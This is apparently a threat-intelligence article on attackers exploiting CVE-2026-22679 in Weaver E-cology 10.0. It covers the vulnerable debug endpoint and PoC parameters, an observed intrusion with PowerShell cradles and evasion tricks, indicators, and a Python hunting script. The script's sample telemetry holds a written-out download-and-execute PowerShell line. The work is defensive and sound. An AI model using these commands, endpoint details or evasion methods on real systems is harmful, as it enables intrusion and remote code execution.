Threat actors began actively exploiting CVE-2026-22679, a critical, unauthenticated remote code execution (RCE) vulnerability in Weaver (Fanwei) E-cology 10.0, just five days after the vendor released a patch, with the first confirmed intrusion activity detected on March 17, 2026.
CVE-2026-22679 carries a CVSS score of 9.8 (Critical) and affects all Weaver E-cology 10.0 builds before build 20260312. The vulnerability resides in a debug API endpoint left accessible in production environments.
Attackers craft malicious POST requests using attacker-controlled interfaceName and methodName JSON parameters that directly reach the application’s Dubbo RPC invoker with zero authentication and no input validation, ultimately routing input straight to the underlying operating system as arbitrary commands.
The public proof-of-concept exploits the interfaceName: "com.weaver.rpc.InvokeCommand" and methodName: "executeCommand" parameters to achieve host-level command execution. Weaver’s vendor fix, released on March 12, 2026, removes the debug endpoint entirely, closing the attack surface.
Vega Threat Research observed the entire intrusion lifecycle on an internet-reachable Windows host running an unpatched Weaver E-cology build, capturing approximately one week of operator behavior across four distinct phases via EDR telemetry.
Every attacker-controlled process throughout the campaign was parented by java.exe, Weaver’s Tomcat-bundled Java Virtual Machine, which demonstrates command injection at the application layer without prior authentication.
RCE Verification via Ping Callbacks
The first observed activity was not a payload drop but a verification step: java.exe spawned three sequential ping.exe commands pointing to 152.32.173[.]138, a callback IP linked to the Goby attack-surface mapping framework.
Goby’s callback infrastructure uses unique marker tokens in URLs to confirm whether a target successfully executed an injected command, and the same IP and gobygo[.]net domain had previously appeared in a February 2026 advisory on Ivanti EPMM exploitation. The process chain java.exe → ping.exe is the definitive host-level indicator of exploitation at this stage.
Three Stagers, Three Quarantines
Over three days, the operator rotated through three PowerShell download cradles targeting two different payload-hosting servers, attempting to land vsgbt.exe and hjchhb.exe from 205.209.116[.]54:2013.
A third stager used a Base64-encoded PowerShell command to download config.js from 161.132.49[.]114, writing it to disk as nvm.exe, a filename designed to impersonate Node Version Manager and evade detection. Every Phase 2 payload was intercepted and quarantined by endpoint defenses before execution.
Target-Aware MSI Delivery
After three failed EXE drops, the operator pivoted to a Windows Installer package: fanwei0324.msi, hosted on 141.11.89[.]42. The filename is deliberately crafted: fanwei is the romanized Chinese name for Weaver (泛微), and 0324 corresponds to the attack date, indicating the operator maintained organized payload naming by target and date.
Despite successfully launching msiexec.exe, the MSI produced only a single NamedPipeEvent with no child processes and no installer actions, suggesting the package was malformed or incompatible with the target environment.
Renamed PowerShell, Obfuscation, and Fileless Execution
Within hours of the failed MSI, the attacker returned to the original Dubbo RCE primitive and escalated to more advanced evasion techniques. First, java.exe copied the legitimate Microsoft-signed powershell.exe to a file named 2.txt, a process-name masquerading technique designed to bypass detections keyed on powershell.exe as a process name.
Next, the operator executed a heavily obfuscated PowerShell command three times, encoding a 576-integer character array and leveraging case randomization (pOwErsHelL, INvoKe-eXpRESsiOn) alongside PowerShell’s variable-substring evasion to avoid the literal string IEX appearing in logs.
When EDR blocked all three attempts, the operator switched to a clear-text DownloadString cradle routed through the renamed 2.txt interpreter, fetching xx.ps1 and then x.ps1 from 132.243.172[.]2, a fileless execution technique that loads and runs the remote script entirely in memory without writing to disk.
Reconnaissance was not a discrete phase: whoami, ipconfig, and tasklist were executed via java.exe throughout all attack phases starting March 19. Because the dubboApi/debug/method endpoint reflects the command’s stdout/stderr directly in the HTTP response body, the attacker never required a persistent shell.
The debug endpoint itself functioned as an interactive command interface: each POST request executed a discovery command and returned the output synchronously, enabling reconnaissance and payload delivery to run concurrently.
| IP Address | Role |
|---|---|
| 205.209.116[.]54 | EXE payload hosting (vsgbt.exe, hjchhb.exe) |
| 161.132.49[.]114 | Payload hosting (config.js / nvm.exe) |
| 141.11.89[.]42 | MSI hosting (fanwei0324.msi) |
| 132.243.172[.]2 | PowerShell script hosting (xx.ps1, x.ps1) |
| 152.32.173[.]138 | Goby callback infrastructure |
Key file hash: fanwei0324.msi SHA256: 147ac3f24b2b63544d65070007888195a98d30e380f2d480edffb3f07a78377f
Malicious filenames to monitor: vsgbt.exe, hjchhb.exe, nvm.exe, fanwei0324.msi, 2.txt (renamed powershell.exe), xx.ps1, x.ps1
Mitigation
Organizations running Weaver E-cology 10.0 should immediately upgrade to build 20260312 or later, which removes the vulnerable debug endpoint entirely.
Security teams should hunt for the process chain java.exe → cmd.exe, java.exe → ping.exe, or java.exe → powershell.exe in EDR telemetry, as all confirmed attacker activity in this campaign originated from the JVM process.
Network defenders should block the five attacker-controlled IP addresses listed above and monitor for DownloadString and IEX activity originating from renamed PowerShell binaries.
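Hunting logic for the java.exe process chains and the renamed-PowerShell cradle activity described in this Mitigation section (and in the detection FAQ below), as an added Python example that is not part of the original article or of Vega’s tooling; the ProcEvent fields, the rule names and the sample telemetry are assumptions modelled on typical EDR process-creation records.

```python
import re
from dataclasses import dataclass

# Children of the Weaver JVM that the write-up identifies as exploitation indicators.
SUSPICIOUS_CHILDREN = {"ping.exe", "cmd.exe", "powershell.exe"}
# Literal cradle markers, case-insensitive because the operator randomized case
# (pOwErsHelL, INvoKe-eXpRESsiOn). Substring-built IEX evades this literal rule,
# which is why the java.exe parent rule below is the primary signal.
CRADLE_RE = re.compile(r"downloadstring|invoke-expression|\biex\b|-e(nc(odedcommand)?)?\b", re.I)

@dataclass
class ProcEvent:             # assumed EDR process-creation record
    parent_image: str        # full path or name of the parent process
    image: str               # file name actually executed (e.g. 2.txt)
    original_name: str       # PE OriginalFileName reported by the sensor
    cmdline: str

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(ev: ProcEvent) -> list[str]:
    """Return the detection names that fire for one process-creation event."""
    parent, image, orig = basename(ev.parent_image), basename(ev.image), ev.original_name.lower()
    findings = []
    # Rule 1: ping/cmd/powershell child of the JVM, matched on the on-disk name or
    # the PE original name so a renamed copy of powershell.exe still counts.
    if parent == "java.exe":
        child = orig if orig in SUSPICIOUS_CHILDREN else image
        if child in SUSPICIOUS_CHILDREN:
            findings.append(f"jvm_spawned_{child}")
    # Rule 2: the binary is PowerShell but runs under another file name (2.txt).
    if orig == "powershell.exe" and image != "powershell.exe":
        findings.append("renamed_powershell")
    # Rule 3: download-cradle syntax from a renamed PowerShell or from a JVM child.
    if CRADLE_RE.search(ev.cmdline) and ("renamed_powershell" in findings or parent == "java.exe"):
        findings.append("download_cradle")
    return findings

def hunt(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    return [(ev.image, f) for ev in events if (f := classify(ev))]

# Constructed sample telemetry (not real captured events); 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Weaver\jre\bin\java.exe", r"C:\Windows\System32\PING.EXE", "ping.exe", "ping -n 1 203.0.113.10"),
    ProcEvent(r"C:\Weaver\jre\bin\java.exe", r"C:\Windows\Temp\2.txt", "PowerShell.EXE",
              "2.txt -nop -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/x.ps1')"),
    ProcEvent(r"C:\Weaver\jre\bin\java.exe", r"C:\Windows\System32\cmd.exe", "Cmd.Exe", "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "PowerShell.EXE", "powershell.exe -c Get-Date"),
]
```

Calling hunt(SAMPLE_EVENTS) returns the three JVM-parented events with their rule hits and drops the benign explorer.exe launch; the renamed 2.txt cradle fires all three rules.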
FAQ
What is CVE-2026-22679?
It is a CVSS 9.8 unauthenticated RCE vulnerability in Weaver E-cology 10.0 that allows attackers to execute OS commands via an exposed Dubbo debug API endpoint with no authentication required.
Which versions of Weaver E-cology are affected?
All Weaver E-cology 10.0 builds released before March 12, 2026 (build 20260312) are vulnerable and must be patched immediately.
How were attackers exploiting this vulnerability in the wild?
Threat actors used the exposed /papi/esearch/data/devops/dubboApi/debug/method endpoint to inject commands via interfaceName and methodName parameters, deploying PowerShell cradles, MSI payloads, and fileless script loaders through the Weaver JVM.
How can organizations detect active exploitation of CVE-2026-22679?
Security teams should look for java.exe spawning ping.exe, powershell.exe, or cmd.exe in EDR logs, and block the confirmed attacker IPs while monitoring for reconnaissance commands like whoami, ipconfig, and tasklist originating from the Weaver process.
Site: thecybrdef.com